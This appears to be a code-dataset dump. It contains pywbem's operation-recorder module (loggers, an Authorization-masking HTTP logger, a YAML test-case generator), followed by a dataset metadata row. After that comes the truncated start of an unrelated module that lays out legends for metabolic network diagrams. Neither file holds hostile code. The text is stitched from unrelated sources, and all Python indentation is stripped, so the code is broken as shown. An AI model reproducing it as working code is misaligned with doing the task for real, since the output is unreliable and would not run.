# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
"""
Operation recorder interface and implementations.
"""
from __future__ import print_function, absolute_import
from collections import namedtuple
try:
from collections import OrderedDict # pylint: disable=import-error
except ImportError:
from ordereddict import OrderedDict # pylint: disable=import-error
from datetime import datetime, timedelta
import logging
import yaml
from yaml.representer import RepresenterError
import six
from .cim_obj import CIMInstance, CIMInstanceName, CIMClass, CIMClassName, \
CIMProperty, CIMMethod, CIMParameter, CIMQualifier, \
CIMQualifierDeclaration, NocaseDict
from .cim_types import CIMInt, CIMFloat, CIMDateTime
from .exceptions import CIMError
from ._logging import PywbemLoggers, LOG_OPS_CALLS_NAME, LOG_HTTP_NAME
from .config import DEFAULT_MAX_LOG_ENTRY_SIZE
if six.PY2:
import codecs # pylint: disable=wrong-import-order
__all__ = ['BaseOperationRecorder', 'TestClientRecorder',
'LogOperationRecorder',
'OpArgs', 'OpResult', 'HttpRequest', 'HttpResponse']
if six.PY2:
_Longint = long # noqa: F821
else:
_Longint = int
OpArgsTuple = namedtuple("OpArgsTuple", ["method", "args"])
def _represent_ordereddict(dump, tag, mapping, flow_style=None):
"""PyYAML representer function for OrderedDict.
This is needed for yaml.safe_dump() to support OrderedDict.
Courtesy:
http://blog.elsdoerfer.name/2012/07/26/make-pyyaml-output-an-ordereddict/
"""
value = []
node = yaml.MappingNode(tag, value, flow_style=flow_style)
if dump.alias_key is not None:
dump.represented_objects[dump.alias_key] = node
best_style = True
if hasattr(mapping, 'items'):
mapping = mapping.items()
for item_key, item_value in mapping:
node_key = dump.represent_data(item_key)
node_value = dump.represent_data(item_value)
if not (isinstance(node_key, yaml.ScalarNode) and
not node_key.style):
best_style = False # pylint: disable=bad-indentation
if not (isinstance(node_value, yaml.ScalarNode) and
not node_value.style):
best_style = False # pylint: disable=bad-indentation
value.append((node_key, node_value))
if flow_style is None:
if dump.default_flow_style is not None:
node.flow_style = dump.default_flow_style
else:
node.flow_style = best_style
return node
yaml.SafeDumper.add_representer(
OrderedDict,
lambda dumper, value:
_represent_ordereddict(dumper, u'tag:yaml.org,2002:map', value))
# Some monkey-patching for better diagnostics:
def _represent_undefined(self, data):
"""Raises flag for objects that cannot be represented"""
raise RepresenterError("cannot represent an object: %s of type: %s; "
"yaml_representers: %r, "
"yaml_multi_representers: %r" %
(data, type(data), self.yaml_representers.keys(),
self.yaml_multi_representers.keys()))
yaml.SafeDumper.represent_undefined = _represent_undefined
class OpArgs(OpArgsTuple):
"""
A named tuple representing the name and input arguments of the invocation
of a :class:`~pywbem.WBEMConnection` method, with the following named fields
and attributes:
Attributes:
method (:term:`unicode string`):
Name of the :class:`~pywbem.WBEMConnection` method.
args (:class:`py:dict`):
Dictionary of input arguments (both positional and keyword-based).
"""
__slots__ = ()
def __repr__(self):
return "OpArgs(method={s.method!r}, args={s.args!r})".format(s=self)
OpResultTuple = namedtuple("OpResultTuple", ["ret", "exc"])
class OpResult(OpResultTuple):
"""
A named tuple representing the result of the invocation of a
:class:`~pywbem.WBEMConnection` method, with the following named fields
and attributes:
Attributes:
ret (:class:`py:object`):
Return value, if the method returned.
`None`, if the method raised an exception.
Note that `None` may be a legitimate return value, so the test for
exceptions should be done based upon the :attr:`exc` variable.
exc (:exc:`~py:exceptions.Exception`):
Exception object, if the method raised an exception.
`None`, if the method returned.
"""
__slots__ = ()
def __repr__(self):
return "OpResult(ret={s.ret!r}, exc={s.exc!r})".format(s=self)
HttpRequestTuple = namedtuple("HttpRequestTuple",
["version", "url", "target", "method", "headers",
"payload"])
class HttpRequest(HttpRequestTuple):
"""
A named tuple representing the HTTP request sent by the WBEM client, with
the following named fields and attributes:
Attributes:
version (:term:`number`):
HTTP version from the request line (10 for HTTP/1.0, 11 for HTTP/1.1).
url (:term:`unicode string`):
URL of the WBEM server (e.g. 'https://myserver.acme.com:15989').
target (:term:`unicode string`):
Target URL segment as stated in request line (e.g. '/cimom').
method (:term:`unicode string`):
HTTP method as stated in the request line (e.g. "POST").
headers (:class:`py:dict`):
A dictionary of all HTTP header fields:
* key (:term:`unicode string`): Name of the header field
* value (:term:`unicode string`): Value of the header field
payload (:term:`unicode string`):
HTTP payload, i.e. the CIM-XML string.
"""
__slots__ = ()
def __repr__(self):
return "HttpRequest(version={s.version!r}, url={s.url!r}, " \
"target={s.target!r}, method={s.method!r}, " \
"headers={s.headers!r}, payload={s.payload!r})" \
.format(s=self)
HttpResponseTuple = namedtuple("HttpResponseTuple",
["version", "status", "reason", "headers",
"payload"])
class HttpResponse(HttpResponseTuple):
"""
A named tuple representing the HTTP response received by the WBEM client,
with the following named fields and attributes:
Attributes:
version (:term:`number`):
HTTP version from the response line (10 for HTTP/1.0, 11 for HTTP/1.1).
status (:term:`number`):
HTTP status code from the response line (e.g. 200).
reason (:term:`unicode string`):
HTTP reason phrase from the response line (e.g. "OK").
headers (:class:`py:dict`):
A dictionary of all HTTP header fields:
* key (:term:`unicode string`): Name of the header field
* value (:term:`unicode string`): Value of the header field
payload (:term:`unicode string`):
HTTP payload, i.e. the CIM-XML string.
"""
__slots__ = ()
def __repr__(self):
return "HttpResponse(version={s.version!r}, status={s.status!r}, " \
"reason={s.reason!r}, headers={s.headers!r}, " \
"payload={s.payload!r})".format(s=self)
class BaseOperationRecorder(object):
# pylint: disable=too-many-instance-attributes
"""
Abstract base class defining the interface to an operation recorder,
that records the WBEM operations executed in a connection to a WBEM
server.
An operation recorder can be registered by setting the
:attr:`~pywbem.WBEMConnection.operation_recorder` instance
attribute of the :class:`~pywbem.WBEMConnection` object to an
object of a subclass of this base class.
When an operation recorder is registered on a connection, each operation
that is executed on the connection will cause the :meth:`record`
method of the operation recorder object to be called, if the recorder is
enabled.
The operation recorder is by default enabled, and can be disabled and
re-enabled using the :meth:`~pywbem.BaseOperationRecorder.disable` and
:meth:`~pywbem.BaseOperationRecorder.enable` methods, respectively.
This can be used to temporarily pause the recorder.
"""
def __init__(self):
self._enabled = True
self._conn_id = None
self.reset()
def enable(self):
"""Enable the recorder."""
self._enabled = True
def disable(self):
"""Disable the recorder."""
self._enabled = False
@property
def enabled(self):
"""Indicate whether the recorder is enabled."""
return self._enabled
@staticmethod
def open_file(filename, file_mode='w'):
"""
A static convience function that performs the open of the recorder file
correctly for different versions of python. This covers the
issue where the file should be opened in text mode but that is
done differently in python 2 and python 3
Parameters:
filename(:term:`string`):
Name of the file where the recorder output will be written
file_mode(:term:`string`):
Optional file mode. The default is 'w' which overwrites any
existing file. if 'a' is used, the data is appended to any
existing file.
Example::
recorder = TestClientRecorder(
BaseOperationRecorder.open_file('recorder.log'))
"""
if six.PY2:
# Open with codecs to define text mode
return codecs.open(filename, mode=file_mode, encoding='utf-8')
return open(filename, file_mode, encoding='utf8')
def reset(self, pull_op=None):
"""Reset all the attributes in the class. This also allows setting
the pull_op attribute that defines whether the operation is to be
a traditional or pull operation.
This does NOT reset _conn.id as that exists through the life of
the connection.
"""
self._pywbem_method = None
self._pywbem_args = None
self._pywbem_result_ret = None
self._pywbem_result_exc = None
self._http_request_version = None
self._http_request_url = None
self._http_request_target = None
self._http_request_method = None
self._http_request_headers = None
self._http_request_payload = None
self._http_response_version = None
self._http_response_status = None
self._http_response_reason = None
self._http_response_headers = None
self._http_response_payload = None
self._pull_op = pull_op
def stage_wbem_connection(self, wbem_connection):
"""
Stage information about the connection. Used only by
LogOperationRecorder.
"""
pass
def stage_pywbem_args(self, method, **kwargs):
"""
Set requst method and all args.
Normally called before the cmd is executed to record request
parameters
"""
# pylint: disable=attribute-defined-outside-init
self._pywbem_method = method
self._pywbem_args = kwargs
def stage_pywbem_result(self, ret, exc):
""" Set Result return info or exception info"""
# pylint: disable=attribute-defined-outside-init
self._pywbem_result_ret = ret
self._pywbem_result_exc = exc
def stage_http_request(self, conn_id, version, url, target, method, headers,
payload):
"""Set request HTTP information including url, headers, etc."""
# pylint: disable=attribute-defined-outside-init
self._http_request_version = version
self._http_request_conn_id = conn_id
self._http_request_url = url
self._http_request_target = target
self._http_request_method = method
self._http_request_headers = headers
self._http_request_payload = payload
# pylint: disable=unused-argument
def stage_http_response1(self, conn_id, version, status, reason, headers):
"""Set response http info including headers, status, etc.
conn_id unused here. Used in log"""
# pylint: disable=attribute-defined-outside-init
self._http_response_version = version
self._http_response_status = status
self._http_response_reason = reason
self._http_response_headers = headers
def stage_http_response2(self, payload):
"""Stage second part of http response, the payload"""
# pylint: disable=attribute-defined-outside-init
self._http_response_payload = payload
def record_staged(self):
"""Encode staged information on request and result to output"""
if self.enabled:
pwargs = OpArgs(
self._pywbem_method,
self._pywbem_args)
pwresult = OpResult(
self._pywbem_result_ret,
self._pywbem_result_exc)
httpreq = HttpRequest(
self._http_request_version,
self._http_request_url,
self._http_request_target,
self._http_request_method,
self._http_request_headers,
self._http_request_payload)
httpresp = HttpResponse(
self._http_response_version,
self._http_response_status,
self._http_response_reason,
self._http_response_headers,
self._http_response_payload)
self.record(pwargs, pwresult, httpreq, httpresp)
def record(self, pywbem_args, pywbem_result, http_request, http_response):
"""
Function that is called to record a single WBEM operation, i.e. the
invocation of a single :class:`~pywbem.WBEMConnection` method.
This function is called only when the recorder is enabled, i.e. it
does not need to check for recorder enablement.
Parameters:
pywbem_args (:class:`~pywbem.OpArgs`):
The name and input arguments of the :class:`~pywbem.WBEMConnection`
method that is recorded.
pywbem_result (:class:`~pywbem.OpResult`):
The result (return value or exception) of the
:class:`~pywbem.WBEMConnection` method that is recorded.
http_request (:class:`~pywbem.HttpRequest`):
The HTTP request sent by the :class:`~pywbem.WBEMConnection` method
that is recorded.
`None`, if no HTTP request had been sent (e.g. because an exception
was raised before getting there).
http_response (:class:`~pywbem.HttpResponse`):
The HTTP response received by the :class:`~pywbem.WBEMConnection`
method that is recorded.
`None`, if no HTTP response had been received (e.g. because an
exception was raised before getting there).
"""
raise NotImplementedError
class LogOperationRecorder(BaseOperationRecorder):
"""
An Operation Recorder that logs the information to a set of named logs.
This recorder uses two named logs:
LOG_OPS_CALLS_NAME - Logger for cim_operations method calls and responses
LOG_HTTP_NAME - Logger for http_requests and responses
This also implements a method to log information on each connection.
All logging calls are at the debug level.
"""
def __init__(self, max_log_entry_size=None):
"""
Creates the the loggers and sets the max_log_size for each if
the input parameter max_log_entry_size is not `None`.
Parameters: (:term:`integer`)
max_log_entry_size(:term:`integer`)
The maximum size of each log entry. This is primarily to limit
response sizes since they could be enormous.
If `None`, no size limit and the full request or response is logged.
"""
super(LogOperationRecorder, self).__init__()
# compute max entry size for each logger
max_sz = max_log_entry_size if max_log_entry_size \
else DEFAULT_MAX_LOG_ENTRY_SIZE
self.opslogger = logging.getLogger(LOG_OPS_CALLS_NAME)
ops_logger_info = PywbemLoggers.get_logger_info(LOG_OPS_CALLS_NAME)
opsdetaillevel = ops_logger_info[0] if ops_logger_info else None
self.ops_max_log_size = max_sz if opsdetaillevel == 'min' \
else None
self.httplogger = logging.getLogger(LOG_HTTP_NAME)
http_logger_info = PywbemLoggers.get_logger_info(LOG_HTTP_NAME)
httpdetaillevel = http_logger_info[0] if http_logger_info else None
self.http_max_log_size = max_sz if httpdetaillevel == 'min' \
else None
def stage_wbem_connection(self, wbem_connection):
"""
Log connection information. This includes the connection id
that should remain throught the life of the connection.
"""
self._conn_id = wbem_connection.conn_id
if self.enabled:
self.opslogger.debug('Connection:%s %r', self._conn_id,
wbem_connection)
def stage_pywbem_args(self, method, **kwargs):
"""
Log request method and all args.
Normally called before the cmd is executed to record request
parameters.
This method does not limit size of log record.
"""
# pylint: disable=attribute-defined-outside-init
self._pywbem_method = method
if self.enabled and self.opslogger.isEnabledFor(logging.DEBUG):
# Order kwargs. Note that this is done automatically starting
# with python 3.6
kwstr = ', '.join([('{0}={1!r}'.format(key, kwargs[key]))
for key in sorted(six.iterkeys(kwargs))])
self.opslogger.debug('Request:%s %s(%s)', self._conn_id, method,
kwstr)
def stage_pywbem_result(self, ret, exc):
"""
Log result return or exception parameter. This function allows
setting maximum size on the result parameter logged because response
information can be very large
.
"""
def format_result(ret, max_len):
""" format ret as repr while clipping it to max_len if
max_len is not None.
"""
result = '{0!r}'.format(ret)
if max_len and (len(result) > max_len):
result = (result[:max_len] + '...')
return result
if self.enabled and self.opslogger.isEnabledFor(logging.DEBUG):
if exc: # format exception
result = format_result(
'%s(%s)' % (exc.__class__.__name__, exc),
self.ops_max_log_size)
else: # format result
# test if type is tuple (subclass of tuple but not type tuple)
# pylint: disable=unidiomatic-typecheck
if isinstance(ret, tuple) and \
type(ret) is not tuple: # pylint: disable=C0123
try: # test if field instances or paths
rtn_data = ret.instances
data_str = 'instances'
except AttributeError:
rtn_data = ret.paths
data_str = 'paths'
rtn_data = format_result(rtn_data, self.ops_max_log_size)
try: # test for query_result_class
qrc = ', query_result_class=%s' % ret.query_result_class
except AttributeError:
qrc = ""
result = "{0.__name__}(context={1}, eos={2}{3}, {4}={5})" \
.format(type(ret), ret.context, ret.eos, qrc,
data_str, rtn_data)
else:
result = format_result(ret, self.ops_max_log_size)
return_type = 'Exception' if exc else 'Return'
self.opslogger.debug('%s:%s %s(%s)', return_type, self._conn_id,
self._pywbem_method,
result)
def stage_http_request(self, conn_id, version, url, target, method, headers,
payload):
"""Log request HTTP information including url, headers, etc."""
if self.enabled and self.httplogger.isEnabledFor(logging.DEBUG):
# pylint: disable=attribute-defined-outside-init
# if Auth header, mask data
if 'Authorization' in headers:
authtype, cred = headers['Authorization'].split(' ')
headers['Authorization'] = '%s %s' % (authtype, 'X' * len(cred))
header_str = ' '.join('{0}:{1!r}'.format(k, v)
for k, v in headers.items())
self.httplogger.debug('Request:%s %s %s %s %s %s\n %s',
conn_id, method, target, version, url,
header_str, payload)
def stage_http_response1(self, conn_id, version, status, reason, headers):
"""Set response http info including headers, status, etc. """
# pylint: disable=attribute-defined-outside-init
self._http_response_version = version
self._http_response_status = status
self._http_response_reason = reason
self._http_response_headers = headers
self._http_response_conn_id = conn_id
def stage_http_response2(self, payload):
"""Log complete http response, including response1 and payload"""
# required because http code uses sending all None to reset
# parameters. We ignore that
if not self._http_response_version and not payload:
return
if self.enabled and self.httplogger.isEnabledFor(logging.DEBUG):
if self._http_response_headers:
header_str = \
' '.join('{0}:{1!r}'.format(k, v)
for k, v in self._http_response_headers.items())
else:
header_str = ''
# format the payload possibly with max size limit
payload = '%r' % payload.decode('utf-8')
if self.http_max_log_size and \
(len(payload) > self.http_max_log_size):
payload = (payload[:self.http_max_log_size] + '...')
self.httplogger.debug('Response:%s %s:%s %s %s\n %s',
self._http_response_conn_id,
self._http_response_status,
self._http_response_reason,
self._http_response_version,
header_str,
payload)
def record_staged(self):
"""Not used for logging"""
pass
def record(self, pywbem_args, pywbem_result, http_request, http_response):
"""Not used for logging"""
pass
class TestClientRecorder(BaseOperationRecorder):
"""
An operation recorder that generates test cases for each recorded
operation. The test cases are in the YAML format suitable for the
`test_client` unit test module of the pywbem project.
"""
# HTTP header fields to exclude when creating the testcase
# (in lower case)
EXCLUDE_REQUEST_HEADERS = [
'authorization',
'content-length',
'content-type',
]
EXCLUDE_RESPONSE_HEADERS = [
'content-length',
'content-type',
]
# Dummy server URL and credentials for use in generated test case
TESTCASE_URL = 'http://acme.com:80'
TESTCASE_USER = 'username'
TESTCASE_PASSWORD = 'password'
def __init__(self, fp):
"""
Parameters:
fp (file):
An open file that each test case will be written to. This file
should have been opened in text mode.
Since there are differences between python 2 and 3 in opening
files in text mode, the static method
:meth:`~pywbem.BaseOperationRecorder.open_file`
can be used to open the file or python 2/3 compatible open::
from io import open
f = open('blah.log', encoding='utf-8')
Example::
recorder = TestClientRecorder(
BaseOperationRecorder.open_file('recorder.log'))
"""
super(TestClientRecorder, self).__init__()
self._fp = fp
def record(self, pywbem_args, pywbem_result, http_request, http_response):
"""
Function that records the invocation of a single
:class:`~pywbem.WBEMConnection` method, by appending a corresponding
test case to the file.
Parameters: See :meth:`pywbem.BaseOperationRecorder.record`.
"""
testcase = OrderedDict()
testcase['name'] = pywbem_args.method
testcase['description'] = 'Generated by TestClientRecorder'
tc_pywbem_request = OrderedDict()
tc_pywbem_request['url'] = TestClientRecorder.TESTCASE_URL
tc_pywbem_request['creds'] = [TestClientRecorder.TESTCASE_USER,
TestClientRecorder.TESTCASE_PASSWORD]
tc_pywbem_request['namespace'] = 'root/cimv2'
tc_pywbem_request['timeout'] = 10
tc_pywbem_request['debug'] = False
tc_operation = OrderedDict()
tc_operation['pywbem_method'] = pywbem_args.method
for arg_name in pywbem_args.args:
tc_operation[arg_name] = self.toyaml(pywbem_args.args[arg_name])
tc_pywbem_request['operation'] = tc_operation
testcase['pywbem_request'] = tc_pywbem_request
tc_pywbem_response = OrderedDict()
if pywbem_result.ret is not None:
yaml_txt = 'pullresult' if self._pull_op else 'result'
tc_pywbem_response[yaml_txt] = self.toyaml(pywbem_result.ret)
if pywbem_result.exc is not None:
exc = pywbem_result.exc
if isinstance(exc, CIMError):
tc_pywbem_response['cim_status'] = self.toyaml(exc.status_code)
else:
tc_pywbem_response['exception'] = self.toyaml(
exc.__class__.__name__)
testcase['pywbem_response'] = tc_pywbem_response
tc_http_request = OrderedDict()
if http_request is not None:
tc_http_request['verb'] = http_request.method
tc_http_request['url'] = TestClientRecorder.TESTCASE_URL
if http_request.target:
tc_http_request['url'] += http_request.target
tc_request_headers = OrderedDict()
if http_request.headers is not None:
for hdr_name in http_request.headers:
if hdr_name.lower() not in \
TestClientRecorder.EXCLUDE_REQUEST_HEADERS:
tc_request_headers[hdr_name] = \
http_request.headers[hdr_name]
tc_http_request['headers'] = tc_request_headers
if http_request.payload is not None:
data = http_request.payload.decode('utf-8')
data = data.replace('><', '>\n<').strip()
else:
data = None
tc_http_request['data'] = data
testcase['http_request'] = tc_http_request
tc_http_response = OrderedDict()
if http_response is not None:
tc_http_response['status'] = http_response.status
tc_response_headers = OrderedDict()
if http_response.headers is not None:
for hdr_name in http_response.headers:
if hdr_name.lower() not in \
TestClientRecorder.EXCLUDE_RESPONSE_HEADERS:
tc_response_headers[hdr_name] = \
http_response.headers[hdr_name]
tc_http_response['headers'] = tc_response_headers
if http_response.payload is not None:
data = http_response.payload.decode('utf-8')
data = data.replace('><', '>\n<').strip()
else:
data = None
tc_http_response['data'] = data
else:
tc_http_response['exception'] = "# Change this to a callback " \
"function that causes this " \
"condition."
testcase['http_response'] = tc_http_response
testcases = []
testcases.append(testcase)
# The file is open in text mode, so we produce a unicode string
data = yaml.safe_dump(testcases, encoding=None, allow_unicode=True,
default_flow_style=False, indent=4)
data = data.replace('\n\n', '\n') # YAML dump duplicates newlines
self._fp.write(data)
self._fp.flush()
def toyaml(self, obj):
"""
Convert any allowable input argument to or return value from an
operation method to an object that is ready for serialization into
test_client yaml format.
"""
# namedtuple is subclass of tuple so it is instance of tuple but
# not type tuple. Cvt to dictionary and cvt dict to yaml.
# pylint: disable=unidiomatic-typecheck
if isinstance(obj, tuple) and type(obj) is not tuple:
ret_dict = obj._asdict()
return self.toyaml(ret_dict)
if isinstance(obj, (list, tuple)):
ret = []
# This does not handle namedtuple
for item in obj:
ret.append(self.toyaml(item))
return ret
elif isinstance(obj, (dict, NocaseDict)):
ret_dict = OrderedDict()
for key in obj.keys(): # get keys in original case
ret_dict[key] = self.toyaml(obj[key])
return ret_dict
elif obj is None:
return obj
elif isinstance(obj, six.binary_type):
return obj.decode("utf-8")
elif isinstance(obj, six.text_type):
return obj
elif isinstance(obj, CIMInt):
return _Longint(obj)
elif isinstance(obj, (bool, int)):
# TODO ks jun 17 should the above be six.integertypes???
# The check for int must be after CIMInt, because CIMInt is int.
return obj
elif isinstance(obj, CIMFloat):
return float(obj)
elif isinstance(obj, CIMDateTime):
return str(obj)
elif isinstance(obj, datetime):
return CIMDateTime(obj)
elif isinstance(obj, timedelta):
return CIMDateTime(obj)
elif isinstance(obj, CIMInstance):
ret_dict = OrderedDict()
ret_dict['pywbem_object'] = 'CIMInstance'
ret_dict['classname'] = self.toyaml(obj.classname)
ret_dict['properties'] = self.toyaml(obj.properties)
ret_dict['path'] = self.toyaml(obj.path)
return ret_dict
elif isinstance(obj, CIMInstanceName):
ret_dict = OrderedDict()
ret_dict['pywbem_object'] = 'CIMInstanceName'
ret_dict['classname'] = self.toyaml(obj.classname)
ret_dict['namespace'] = self.toyaml(obj.namespace)
ret_dict['keybindings'] = self.toyaml(obj.keybindings)
return ret_dict
elif isinstance(obj, CIMClass):
ret_dict = OrderedDict()
ret_dict['pywbem_object'] = 'CIMClass'
ret_dict['classname'] = self.toyaml(obj.classname)
ret_dict['superclass'] = self.toyaml(obj.superclass)
ret_dict['properties'] = self.toyaml(obj.properties)
ret_dict['methods'] = self.toyaml(obj.methods)
ret_dict['qualifiers'] = self.toyaml(obj.qualifiers)
return ret_dict
elif isinstance(obj, CIMClassName):
ret_dict = OrderedDict()
ret_dict['pywbem_object'] = 'CIMClassName'
ret_dict['classname'] = self.toyaml(obj.classname)
ret_dict['host'] = self.toyaml(obj.host)
ret_dict['namespace'] = self.toyaml(obj.namespace)
return ret_dict
elif isinstance(obj, CIMProperty):
ret_dict = OrderedDict()
ret_dict['pywbem_object'] = 'CIMProperty'
ret_dict['name'] = self.toyaml(obj.name)
ret_dict['value'] = self.toyaml(obj.value)
ret_dict['type'] = self.toyaml(obj.type)
ret_dict['reference_class'] = self.toyaml(obj.reference_class)
ret_dict['embedded_object'] = self.toyaml(obj.embedded_object)
ret_dict['is_array'] = self.toyaml(obj.is_array)
ret_dict['array_size'] = self.toyaml(obj.array_size)
ret_dict['class_origin'] = self.toyaml(obj.class_origin)
ret_dict['propagated'] = self.toyaml(obj.propagated)
ret_dict['qualifiers'] = self.toyaml(obj.qualifiers)
return ret_dict
elif isinstance(obj, CIMMethod):
ret_dict = OrderedDict()
ret_dict['pywbem_object'] = 'CIMMethod'
ret_dict['name'] = self.toyaml(obj.name)
ret_dict['return_type'] = self.toyaml(obj.return_type)
ret_dict['class_origin'] = self.toyaml(obj.class_origin)
ret_dict['propagated'] = self.toyaml(obj.propagated)
ret_dict['parameters'] = self.toyaml(obj.parameters)
ret_dict['qualifiers'] = self.toyaml(obj.qualifiers)
return ret_dict
elif isinstance(obj, CIMParameter):
ret_dict = OrderedDict()
ret_dict['pywbem_object'] = 'CIMParameter'
ret_dict['name'] = self.toyaml(obj.name)
ret_dict['type'] = self.toyaml(obj.type)
ret_dict['reference_class'] = self.toyaml(obj.reference_class)
ret_dict['is_array'] = self.toyaml(obj.is_array)
ret_dict['array_size'] = self.toyaml(obj.array_size)
ret_dict['qualifiers'] = self.toyaml(obj.qualifiers)
return ret_dict
elif isinstance(obj, CIMQualifier):
ret_dict = OrderedDict()
ret_dict['pywbem_object'] = 'CIMQualifier'
ret_dict['name'] = self.toyaml(obj.name)
ret_dict['value'] = self.toyaml(obj.value)
ret_dict['type'] = self.toyaml(obj.type)
ret_dict['propagated'] = self.toyaml(obj.propagated)
ret_dict['tosubclass'] = self.toyaml(obj.tosubclass)
ret_dict['toinstance'] = self.toyaml(obj.toinstance)
ret_dict['overridable'] = self.toyaml(obj.overridable)
ret_dict['translatable'] = self.toyaml(obj.translatable)
return ret_dict
elif isinstance(obj, CIMQualifierDeclaration):
ret_dict = OrderedDict()
ret_dict['pywbem_object'] = 'CIMQualifierDeclaration'
ret_dict['name'] = self.toyaml(obj.name)
ret_dict['type'] = self.toyaml(obj.type)
ret_dict['value'] = self.toyaml(obj.value)
ret_dict['is_array'] = self.toyaml(obj.is_array)
ret_dict['array_size'] = self.toyaml(obj.array_size)
ret_dict['scopes'] = self.toyaml(obj.scopes)
ret_dict['tosubclass'] = self.toyaml(obj.tosubclass)
ret_dict['toinstance'] = self.toyaml(obj.toinstance)
ret_dict['overridable'] = self.toyaml(obj.overridable)
ret_dict['translatable'] = self.toyaml(obj.translatable)
return ret_dict
else:
raise TypeError("Invalid type in TestClientRecorder.toyaml(): "
"%s %s" % (obj.__class__.__name__, type(obj)))
| ssOleg/pywbem | pywbem/_recorder.py | _recorder.py | py | 36,379 | python | en | code | null | github-code | 36 | [
{
"api_name": "six.PY2",
"line_number": 43,
"usage_type": "attribute"
},
{
"api_name": "six.PY2",
"line_number": 51,
"usage_type": "attribute"
},
{
"api_name": "collections.namedtuple",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "yaml.MappingNode",
... |
17849611547 | from ..config import np, Vector, DataName, MetaboliteConfig, ParameterName, LegendConfig
from ..metabolic_network_contents.metabolite import Metabolite
from ..metabolic_network_contents.reaction import Reaction
metabolite_width = MetaboliteConfig.width
class NormalLegendConfig(object):
metabolite_content_dict = {
'G6P': Metabolite('G6P'),
'LAC': Metabolite('LAC').set_mid_data_state(True),
'MAL': Metabolite('MAL').set_mid_data_state(True).set_mixed_mid_data_state(True),
'GLU': Metabolite('GLU').set_biomass_flux_state(True),
'GLY': Metabolite('GLY').set_input_state(True),
'GLC': Metabolite('GLC').set_input_state(True).set_c13_labeling_state(True),
}
reaction_content_dict = {
'fluxes': (Reaction('unidirectional'), Reaction('bidirectional', reversible=True)),
'boundary_flux': Reaction('boundary_flux').set_boundary_flux(True),
}
text_content_dict = {
'G6P': 'Normal metabolites',
'LAC': 'Metabolites with mass spec data',
'MAL': 'Metabolites with mixed mass spec\ndata (mitochondria and cytosol)',
'GLU': 'Metabolites with biomass flux',
'GLY': 'Input or output metabolites\nwith fixed MID',
'GLC': 'Input metabolites with $\mathregular{^{13}}$C\nlabelled',
'fluxes': 'Normal fluxes (unidirectional\nor reversible)',
'boundary_flux': 'Boundary fluxes with fixed value',
}
class SmallerSizeLegendConfig(object):
metabolite_content_dict = {
'GLN': Metabolite('GLN').set_input_state(True),
'OAC': Metabolite('OAC'),
'MAL': Metabolite('MAL').set_data_sensitivity_state(DataName.raw_model_raw_data),
'3PG': Metabolite('3PG').set_data_sensitivity_state(DataName.medium_data),
'GLC': Metabolite('GLC').set_data_sensitivity_state(DataName.few_data),
}
reaction_content_dict = {}
text_content_dict = {
'GLN': 'Input or output metabolites\nwith fixed MID',
'OAC': 'With MID data in all data set',
'MAL': 'With MID data in all + experimental\ndata set',
'3PG': 'With MID data in all + experimental\n+ medium data set',
'GLC': 'With MID data in all + experimental\n+ medium + small data set',
}
class RemovePathwayLegendConfig(object):
metabolite_content_dict = {
'LAC': Metabolite('LAC').set_mid_data_state(True),
'R5P': Metabolite('R5P').set_data_sensitivity_state(DataName.data_without_ppp),
'MAL': Metabolite('MAL').set_data_sensitivity_state(DataName.data_without_tca),
'GLU': Metabolite('GLU').set_data_sensitivity_state(DataName.data_without_aa),
# 'CIT': Metabolite('CIT').set_data_sensitivity_state(DataName.medium_data_without_combination),
}
reaction_content_dict = {}
text_content_dict = {
'LAC': 'Experimental data set',
'R5P': 'Removed MID data of PPP metabolites',
'MAL': 'Removed MID data of TCA metabolites',
'GLU': 'Removed MID data of AA metabolites',
# 'CIT': 'Added compartmental MID',
}
class ConstantFluxLegendConfig(object):
metabolite_content_dict = {}
reaction_content_dict = {
'fluxes': (Reaction('unidirectional'), Reaction('bidirectional', reversible=True)),
'boundary_fluxes': Reaction('boundary_flux').set_boundary_flux(True),
}
text_content_dict = {
'fluxes': 'Normal fluxes (unidirectional\nor reversible)',
'boundary_fluxes': 'Preset fixed boundary fluxes',
}
def legend_layout_generator(mode=ParameterName.normal):
if mode == ParameterName.normal or mode == ParameterName.horizontal:
legend_config = NormalLegendConfig
elif mode == DataName.smaller_data_size:
legend_config = SmallerSizeLegendConfig
elif mode == DataName.data_without_pathway:
legend_config = RemovePathwayLegendConfig
elif mode == DataName.different_constant_flux:
legend_config = ConstantFluxLegendConfig
else:
raise ValueError()
metabolite_content_dict, reaction_content_dict, text_content_dict = \
legend_config.metabolite_content_dict, legend_config.reaction_content_dict, legend_config.text_content_dict
total_item_list = []
for metabolite_key, metabolite_content in metabolite_content_dict.items():
text_content = text_content_dict[metabolite_key]
total_item_list.append((ParameterName.metabolite, metabolite_key, metabolite_content, text_content))
for reaction_key, reaction_content in reaction_content_dict.items():
text_content = text_content_dict[reaction_key]
total_item_list.append((ParameterName.reaction, reaction_key, reaction_content, text_content))
total_item_num = len(total_item_list)
each_row_height = LegendConfig.legend_each_row_height
if mode == ParameterName.horizontal:
total_row_num = 2
total_col_num = np.ceil(total_item_num / 2)
total_width = LegendConfig.legend_horizontal_width
else:
total_row_num = total_item_num
total_col_num = 1
total_width = LegendConfig.legend_width
layout_index_list = [
(item_index % total_row_num, item_index // total_row_num) for item_index in range(total_item_num)]
total_height = total_row_num * each_row_height
each_col_width = total_width / total_col_num
# patch_center_x_axis = 0.15 * total_width
# text_left_x_axis = 0.3 * total_width
# text_width = total_width - text_left_x_axis
multiple_reaction_up_down_distance = 0.005
flux_width = metabolite_width
base_patch_center_x_axis = 0.15 * each_col_width
base_text_left_x_axis = 0.3 * each_col_width
text_width = each_col_width - base_text_left_x_axis
patch_raw_obj_dict = {}
text_param_dict = {}
for (row_index, col_index), (item_type, item_key, item_content, text_content) \
in zip(layout_index_list, total_item_list):
patch_center_x_axis = col_index * each_col_width + base_patch_center_x_axis
text_left_x_axis = col_index * each_col_width + base_text_left_x_axis
flux_left_x_value, flux_right_x_value = (
patch_center_x_axis - flux_width / 2, patch_center_x_axis + flux_width / 2)
